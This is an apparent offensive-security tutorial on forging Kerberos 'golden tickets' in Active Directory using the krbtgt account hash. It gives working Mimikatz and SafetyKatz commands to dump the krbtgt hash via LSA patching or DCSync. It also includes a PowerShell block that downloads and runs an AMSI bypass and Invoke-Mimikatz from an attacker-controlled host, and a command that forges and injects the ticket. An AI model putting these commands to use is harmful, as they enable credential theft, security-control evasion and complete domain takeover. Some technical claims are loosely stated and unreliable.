A golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.
Since user account validation (PAC validation) is not done by Domain Controller (KDC service) until TGT is older than 20 minutes, we can use even deleted/revoked accounts.
The krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine.
Single password change has no effect on this attack as password history is maintained for the account (krbtgtremembers the last two passwords).
Microsoft recommends to change the krbtgt password twice within 6 months (there is a script for the purpose).
Attack starts at step 3 (TGS_REQ):
The TGT is encrypted using RC4 hash or AES keys of the krbtgt account, KDC will decrypt this and issue the service ticket with the same group memberships and validation info found in the TGT.
So, if you have the krbtgt hash, you can forge your own TGT which includes the PAC data with any group membership you want!
Another misconfiguration made by Microsoft is this one:
The only validation in this step made by the DC is, if it can decrypt the TGT whatever is inside is correct and must respond with a TGS.
We first need to get the krbtgt hash. So execute mimikatz on DC as Domain Admin to get krbtgt hash within the dump of NTDS.dit:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –ComputerName <domain-controller-FQDN>
Or we can use the DCSync technique avoiding code execution:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\\krbtgt" "exit"'
.\\SafetyKatz.exe "lsadump::dcsync /user:<domain>\\krbtgt" "exit"
Or we can use the classic technique:
$Target="FQDN of domain controller"
$Sess=New-PSSession -ComputerName $Target
Invoke-Command -Session $Sess -ScriptBlock {
iex (New-Object System.Net.WebClient).DownloadString('<http://ip.of.attacker.machine>:port/amsibypass.txt');
iex (New-Object System.Net.WebClient).DownloadString('<http://ip.of.attacker.machine>:port/Invoke-Mimikatz.ps1');
}
With Mimikatz (not work anymore):
Invoke-Mimikatz -Command '"kerberos::golden /User:<user to impersonate> /domain:<domain< /sid:<domain sid> /krbtgt:<hash rc4 of krbtgtaccount> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'